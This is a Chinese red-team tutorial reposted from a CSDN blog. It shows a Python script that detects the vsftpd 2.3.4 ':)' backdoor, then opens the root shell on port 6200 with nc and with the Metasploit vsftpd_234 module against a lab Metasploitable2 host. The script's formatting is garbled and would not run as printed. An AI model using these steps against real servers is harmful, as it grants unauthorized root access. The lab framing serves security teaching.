1. 首页
  2. 红队技术

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;

 

当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。

环境搭建

 

攻击机(本机):192.168.1.3

靶机(metaspolit2):192.168.1.5

nmap进行漏洞检测

 

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

python脚本进行漏洞检测

 

代码如下:

import socketfrom ftplib 
import FTP url = input("请输入你需要检测的地址:")
ftp = FTP()username = 'root:)' #用户名必须包含:)这两个字符
password = 'anonymous' #密码随便啥都行
try:    
ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒    ftp.login(username,password)   
ftp.quit()except:    
print("完成登录检测")
try:    s = socket.socket() #使用socket函数来检测是否有漏洞存在    s.connect((url,6200))    
s.close()    p
rint("存在微笑漏洞")
except:    
print("没有发现笑脸漏洞!")

输出结果:

 

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

(一)使用nc进行漏洞利用

1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个

 

密码回车等待,紧接着进行下一步:

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

2、打开一个新窗口,输入nc 目标ip 6200 即可连接。

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

(二)使用msf进行漏洞利用

  1. 打开MSFConsole搜索vsftpd_234并使用

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

2. 设置攻击目标,进行exploit即可获取shell。

python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

 

作者:CSDN博主「xiaochuhe.」

原文链接:https://blog.csdn.net/xiaofengdada/article/details/122693486

 

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/5331.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息